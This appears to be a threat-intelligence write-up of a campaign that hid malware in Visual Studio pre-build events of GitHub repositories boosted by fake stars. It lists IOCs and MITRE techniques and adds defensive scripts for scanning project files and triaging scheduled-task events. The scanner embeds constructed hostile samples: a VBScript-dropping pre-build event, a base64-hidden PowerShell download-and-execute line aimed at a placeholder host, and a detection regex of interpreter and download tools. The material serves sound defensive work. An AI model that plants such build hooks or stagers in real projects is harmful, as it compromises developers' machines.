Keypoints
- Threat actors pushed malicious repositories up GitHub's search results by using GitHub Actions to repeatedly touch a file (so the repo always looks recently updated) and by starring it from a network of fake accounts.
- Malware is concealed inside Visual Studio project files (.csproj/.vcxproj) as pre-build events, which run automatically whenever the project is built, whether from the IDE or from the command line.
- The embedded pre-build payload writes a batch file and a VBScript; the VBScript decodes and runs a base64-encoded PowerShell script that performs geolocation checks and remote downloads.
- The PowerShell downloads encrypted .7z archives from attacker-controlled URLs, extracts them with a predefined password, and executes contained binaries (e.g., feedbackAPI.exe).
- Attackers padded an executable to 750MB to evade scanning services and the delivered binary shows similarities to the Keyzetsu clipper targeting crypto wallets.
- Persistence is achieved by creating a shortcut to the executable and adding a scheduled task named “Feedback_API_VS_Services_Client” that runs daily at 4AM.
MITRE Techniques
- [T1195] Supply Chain Compromise – Distributing malware via manipulated open-source repositories to trick developers (‘manipulating GitHub’s search functionality… using meticulously crafted repositories to distribute malware’).
- [T1059] Command and Scripting Interpreter – Using batch scripts, VBScript, and base64-decoded PowerShell to execute the payload (‘base64-encoded PowerShell script that is decoded and executed by the VBScript file’).
- [T1027] Obfuscated Files or Information – Hiding malicious logic in project files to avoid detection (‘conceal their malware primarily as obfuscated code deep within the .csproj or .vcxproj files’).
- [T1105] Ingress Tool Transfer – Downloading encrypted archives and binaries from attacker-controlled URLs and executing extracted content (‘Downloads encrypted files from each URL, extracts them with a predefined password, and executes the extracted files’).
- [T1053.005] Scheduled Task/Job: Scheduled Task – Establishing persistence by creating a scheduled task that runs the malicious executable daily (‘creating a scheduled task named “Feedback_API_VS_Services_Client” that executes the shortcut at 4AM’).
- [T1585] Establish Accounts – Creating a network of fake GitHub accounts to star repositories and boost perceived trustworthiness (‘attackers employed multiple fake accounts to add bogus stars’).
- [T1614] System Location Discovery – Determining victim geography by resolving the machine’s public IP to a country code and branching on the result (‘Retrieves the country code of the machine’s IP address, determining whether the machine is based in Russia’).
Indicators of Compromise
- [URL] Malicious hosting and payload delivery – hxxps[:]//cdn.discordapp[.]com/attachments/…/VisualStudioEN.7z, hxxps[:]//cdn.discordapp[.]com/attachments/…/VisualStudioRU.7z, and several hxxps[:]//rentry[.]co/raw links.
- [File name] Delivered/extracted binaries – feedbackAPI.exe, main.exe (hosted on CDN), and archived VisualStudioEN.7z/VisualStudioRU.7z.
- [File hash] Example hashes observed – 08b799d56265e93f6aae4f089808d1cb (MD5), cc9d54b78688ef6f41e4f4d0c8bced3e04bfcedc (SHA-1).
- [Domain] Attacker-controlled domains – ooocyber[.]keenetic[.]pro (used in campaign infrastructure).
- [IP] Infrastructure IP example – 188[.]113[.]132[.]109 (listed as related to hosting/downloads).
- [Paste/raw resources] Configuration and payload pointers – hxxps[:]//rentry[.]co/MuckCompanyMMC/raw, hxxps[:]//paste[.]fo/raw/dd6cd76eb5a0, and other rentry/paste/textbin URLs.
The technical attack chain begins with visibility manipulation: attackers create repositories with popular names and use a GitHub Actions workflow to repeatedly touch a benign file (commonly named “log”) so the repository always appears recently updated, while a network of newly created fake accounts stars it to climb the “most stars” ranking. Cloning is harmless; the trap springs when the developer builds the project (from the IDE or with msbuild/dotnet build), because a pre-build event embedded in the .vcxproj/.csproj runs as part of the build with the developer's privileges. That event launches a staged execution: a batch script creates a temporary folder and writes a VBScript, which decodes and runs a base64-encoded PowerShell payload.
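Below is an added example (not code from the report, and not the attackers' own project text) showing what such a pre-build hook looks like inside a project file and how to scan a checkout for it before building. It walks PreBuildEvent/PostBuildEvent/PreLinkEvent text and Exec commands, flags interpreter launches and download helpers, and decodes long base64 runs (as UTF-16LE, which powershell -EncodedCommand expects, and as UTF-8) so a payload hidden in a blob is still searchable. The three sample project files, the example.invalid host and the "telemetry key" disguise are constructed for the demonstration.

```python
"""Flag build-event hooks in MSBuild project files (.csproj/.vcxproj).
Added example for this page, not code from the original report; the three
sample project files defined below are constructed for the demonstration."""
import base64
import re
import xml.etree.ElementTree as ET

# Elements whose text MSBuild hands to cmd.exe before/after a build or link.
EVENT_ELEMENTS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}
# Interpreter launches, download helpers and encoded-command flags.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|cmd(?:\.exe)?\s*/c|wscript|cscript|mshta|certutil|"
    r"bitsadmin|rundll32|regsvr32|curl|wget|-enc(?:odedcommand)?\b|"
    r"frombase64string|iex|invoke-expression|invoke-webrequest|"
    r"downloadstring|downloadfile|net\.webclient",
    re.IGNORECASE,
)
# A base64 run long enough to carry a script rather than a short setting.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")


def _local(tag):
    """Drop the namespace that old-style .csproj/.vcxproj files put on tags."""
    return tag.rsplit("}", 1)[-1]


def _decode_blobs(text):
    """Decode each long base64 run as UTF-16LE (what powershell -enc takes)
    and as UTF-8, so tokens hidden in either encoding become searchable."""
    decoded = []
    for m in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                decoded.append(raw.decode(enc))
            except UnicodeDecodeError:
                pass
    return decoded


def scan_project(xml_text):
    """Return one finding per suspicious build command in a project file."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        commands = []
        if name in EVENT_ELEMENTS and el.text and el.text.strip():
            commands.append(el.text.strip())
        if name == "Exec" and el.get("Command"):
            commands.append(el.get("Command"))
        for cmd in commands:
            # Index 0 is the command as written; later entries are decoded blobs.
            for idx, text in enumerate([cmd] + _decode_blobs(cmd)):
                m = SUSPICIOUS.search(text)
                if m:
                    findings.append({"element": name, "token": m.group(0),
                                     "decoded": idx > 0, "excerpt": text[:60]})
                    break
            else:  # no token anywhere, but an opaque blob in a build step is itself odd
                if B64_RUN.search(cmd):
                    findings.append({"element": name, "token": "base64 blob",
                                     "decoded": False, "excerpt": cmd[:60]})
    return findings


def encode_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Sample 1 (constructed): old-style project whose pre-build event writes and
# runs a VBScript dropper, mirroring the chain described above.
SAMPLE_OLD_STYLE = r"""<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>if not exist "$(TEMP)\VisualStudio" mkdir "$(TEMP)\VisualStudio"
echo Set s = CreateObject("WScript.Shell") &gt; "$(TEMP)\VisualStudio\run.vbs"
cscript //nologo "$(TEMP)\VisualStudio\run.vbs"</PreBuildEvent>
  </PropertyGroup>
</Project>"""
# Sample 2 (constructed): SDK-style project with a harmless pre-build step.
SAMPLE_SDK_STYLE = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="dotnet tool restore" />
  </Target>
</Project>"""
# Sample 3 (constructed): no interpreter name in the command; the PowerShell
# stager hides in a base64 value dressed up as a setting. example.invalid is a
# placeholder host, not an indicator from the report.
HIDDEN_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')"
SAMPLE_DISGUISED = f"""<Project Sdk="Microsoft.NET.Sdk">
  <Target Name="Telemetry" BeforeTargets="Build">
    <Exec Command="setx VS_TELEMETRY_KEY {encode_ps(HIDDEN_PS)}" />
  </Target>
</Project>"""

if __name__ == "__main__":
    for label, xml in (("old-style", SAMPLE_OLD_STYLE), ("sdk", SAMPLE_SDK_STYLE),
                       ("disguised", SAMPLE_DISGUISED)):
        print(label, scan_project(xml))
```

To use it on a real checkout, read each .csproj/.vcxproj (and any imported .props/.targets, which can carry the same hooks) and pass the text to scan_project before the first build. The decode step is what catches the disguised sample: the command line itself contains no interpreter name, so a plain grep for "powershell" would miss it.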
The decoded PowerShell first checks the environment (it looks up the country code of the machine's public IP and uses it to choose a payload, distinguishing Russian from non-Russian hosts; the VisualStudioRU/VisualStudioEN archive names in the indicator list line up with that branch), then downloads encrypted .7z archives from attacker-controlled URLs (Discord CDN, rentry, paste services). It extracts the archives with a hard-coded password, executes the extracted binaries (notably feedbackAPI.exe), and wraps each step in error handling so that failures are swallowed rather than surfaced to the developer. The attackers padded feedbackAPI.exe to roughly 750MB so that scanning services with upload size limits never inspect it.
Post-execution behavior includes creating a shortcut to the installed executable and registering a scheduled task named “Feedback_API_VS_Services_Client” that runs the shortcut daily at 4AM; a per-user task needs no elevation, so this persistence is established without any prompt. Mitigations include manually inspecting project files for unexpected pre-build, post-build or pre-link events and Exec targets, scanning .csproj/.vcxproj contents for embedded scripts or base64 blobs, checking stargazer accounts (age, activity) and suspicious “recently updated” patterns before trusting a search result, and treating the build of an untrusted repository as code execution: do it in a sandbox or disposable VM, and block CI and other automated build systems from building unreviewed project files.
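As an added detection example (not tooling from the report), the Windows Security log records every scheduled task creation as event 4698, with the full task definition XML-escaped inside its TaskContent field; the script below parses such records and flags the traits this persistence has: a task name matching the reported IOC, an action that launches a shortcut or script, an action path under a user-writable directory, and a daily trigger in the early-morning hours. Both event records, the user and host names and the .lnk path are constructed; only the task name and the daily 4AM schedule come from the report. Note that 4698 is only logged when the "Audit Other Object Access Events" subcategory is enabled.

```python
"""Triage Windows Security event 4698 (scheduled task created) for the kind of
persistence described above. Added example for this page, not tooling from the
report; both event records below are constructed, including the .lnk path."""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT = "{http://schemas.microsoft.com/win/2004/08/events/event}"
TASK = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
SCRIPT_EXT = (".lnk", ".vbs", ".js", ".hta", ".ps1", ".bat", ".cmd", ".wsf")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
KNOWN_BAD_NAMES = {"feedback_api_vs_services_client"}  # task name from the report
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")  # TaskContent carries a UTF-16 declaration


def _data(event, name):
    """Fetch one <Data Name=...> value from the EventData section."""
    for d in event.iter(EVT + "Data"):
        if d.get("Name") == name:
            return d.text or ""
    return ""


def analyze_4698(event_xml):
    """Return (task_name, reasons). An empty reasons list means not flagged."""
    event = ET.fromstring(event_xml)
    if event.findtext(f"{EVT}System/{EVT}EventID") != "4698":
        return None, []
    task_name = _data(event, "TaskName")
    # TaskContent is the full task definition, XML-escaped inside the event.
    task = ET.fromstring(XML_DECL.sub("", _data(event, "TaskContent")))
    reasons = []
    if task_name.lstrip("\\").lower() in KNOWN_BAD_NAMES:
        reasons.append("task name matches a reported IOC")
    for exe in task.iter(TASK + "Exec"):
        cmd = (exe.findtext(TASK + "Command") or "").strip().strip('"')
        args = exe.findtext(TASK + "Arguments") or ""
        if cmd.lower().endswith(SCRIPT_EXT):
            reasons.append(f"action runs a shortcut or script: {cmd}")
        if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
            reasons.append("action lives in a user-writable directory")
    if task.find(f".//{TASK}CalendarTrigger/{TASK}ScheduleByDay") is not None:
        start = task.findtext(f".//{TASK}CalendarTrigger/{TASK}StartBoundary") or ""
        hour = start[11:13]  # StartBoundary is ISO 8601, e.g. 2024-04-10T04:00:00
        if hour in ("00", "01", "02", "03", "04", "05"):
            reasons.append(f"daily trigger at {hour}:00, an unattended hour")
    return task_name, reasons


def make_4698(task_name, task_xml, user="alice"):
    """Wrap a task definition in a constructed 4698 record."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4698</EventID>
    <Computer>DEV-PC</Computer></System>
  <EventData><Data Name="SubjectUserName">{user}</Data>
    <Data Name="TaskName">{task_name}</Data>
    <Data Name="TaskContent">{escape(task_xml)}</Data></EventData>
</Event>"""


# Constructed task definitions; the shortcut path is an assumption, the report
# only says the task runs a shortcut to the executable daily at 4AM.
TASK_MAL = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-04-10T04:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\alice\AppData\Local\Temp\VisualStudio\feedbackAPI.lnk</Command>
  </Exec></Actions>
</Task>"""
TASK_BENIGN = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-04-10T12:30:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files\Backup\backup.exe</Command><Arguments>--quiet</Arguments>
  </Exec></Actions>
</Task>"""
EVENT_MALICIOUS = make_4698("\\Feedback_API_VS_Services_Client", TASK_MAL)
EVENT_BENIGN = make_4698("\\NightlyBackup", TASK_BENIGN)

if __name__ == "__main__":
    for evt in (EVENT_MALICIOUS, EVENT_BENIGN):
        name, why = analyze_4698(evt)
        print(name, "->", why or "clean")
```

The name match is the cheap, brittle signal; the other three (shortcut/script action, user-writable path, early-morning daily trigger) survive a renamed task and are what a hunt across a fleet should key on, with the name kept only as a confirmation.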